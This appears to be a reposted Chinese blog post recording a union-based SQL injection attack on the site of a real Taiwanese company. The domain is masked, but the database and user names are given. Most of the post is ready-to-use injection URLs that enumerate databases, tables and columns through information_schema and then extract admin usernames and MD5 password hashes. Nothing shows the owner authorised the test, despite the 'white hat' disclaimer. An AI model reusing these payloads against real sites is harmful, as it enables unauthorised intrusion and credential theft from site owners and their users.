目錄
接上一篇內容
寫在前面
資訊匯總
漏洞匯總:
資料庫資訊:
利用information_schema庫:
1、 資料庫分析
①獲取該用戶權限下,有多少個資料庫
②下一步獲取這兩個資料庫的名字
2、表結構分析
①獲取資料庫多少表
②獲取表名稱
3、用戶資訊分析
首先,我們要先拿到admin表的表結構,即包含的欄位名
獲取4個欄位的名稱
獲取登錄資訊
接上一篇內容
白帽SQL注入實戰程序記錄——TW某凈化設備公司官網
寫在前面
作為一個防御型白帽子子
你一定要知道進攻套路
才能有相應的防御措施
宣告:只做測驗,發現對方的漏洞,并不進行破壞性操作
資訊匯總
漏洞匯總:
1、存在SQL注入漏洞
2、SQL注入查詢長度為9個欄位,即 union select 1,2,3,4,5,6,7,8,9
3、網站無錯誤回顯,SQL執行錯誤顯示空白頁面資料庫資訊:
1、資料庫版本:mysql 5.7.31
2、當前資料庫:jiuyu_jiuyu
3、當前登錄用戶:jiuyu@localhost
4、注入點:http://www.xxx.com.tw/page.php?id=133 union select 1,2,version(),current_user(),5,6,7,8,9利用information_schema庫:
在mysql資料庫中
當前登錄用戶下,會有一個information_schema資料庫
這個資料庫里包含了當前用戶權限下
所有database、table、column、privilege等等的匯總資訊
在注入程序中,可以充分利用,
然后我們根據當前獲得的資訊,進行進一步的資料庫分析
1、 資料庫分析
①獲取該用戶權限下,有多少個資料庫
#拼接注入連接
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,count(distinct(table_schema)),4,5,6,7,8,9 FROM information_schema.tables
#通過information_schema資料庫獲取資料庫相關資訊
通過注入SQL陳述句
得到了資料庫的數量 2 個
②下一步獲取這兩個資料庫的名字
#通過使用limit 可以逐潭訓傳表資料
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,table_schema,4,5,6,7,8,9 FROM information_schema.tables
limit 2
通過添加兩個limit,限定兩潭訓傳值
得到了僅有的兩個資料庫名稱
information_schema 和 jiuyu_jiuyu
information_schema是默認的資訊匯總表
所有,有用的就是jiuyu_jiuyu這個庫
2、表結構分析
得到了目標資料庫:jiuyu_jiuyu
下面對該資料庫進行分析
①獲取資料庫多少表
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,count(distinct(table_name)),4,5,6,7,8,9 FROM information_schema.tables
where table_schema='jiuyu_jiuyu'
#回傳值為 4個表
②獲取表名稱
--只有4個表,使用limit 逐潭訓取表名
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,table_name,4,5,6,7,8,9 FROM information_schema.tables
where table_schema='jiuyu_jiuyu'
limit 1
依次得到四個表
admin
smallclass
wenzhang
neirong
emmm 經過認真分析
不難發現
admin表會有一些重要資訊
其他的wenzhang、neirong之類的應該是一些新聞資訊
下面 我們就對admin表進行資料獲取
3、用戶資訊分析
首先,我們要先拿到admin表的表結構,即包含的欄位名
--獲取admin表的欄位數量
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,count(1),4,5,6,7,8,9 FROM information_schema.columns
where table_name='admin'
#包含四個欄位
獲取4個欄位的名稱
--獲取admin表欄位名稱
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,column_name,4,5,6,7,8,9 FROM information_schema.columns
where table_name='admin'
limit 1
通過limit 逐潭訓取admin表的欄位值 id
username
password
quanxian獲取登錄資訊
是不是有點緊張
用戶名資訊什么的
--獲取admin表的資料值
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,username,password,5,6,7,8,9 FROM jiuyu_jiuyu.admin
成功獲取用戶資訊回傳值,
當然,資訊是md5過的
如果想破解出明文,,,不!你不想!
歡迎關注我的微信公眾號:微信搜索 snail_linux 更多精彩內容哦~~~~
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/272028.html
標籤:其他
上一篇:讓我們一起開發【菜譜系統】吧,滾雪球學 Python 第三輪專案計劃
下一篇:大數加減乘除,一文徹底搞定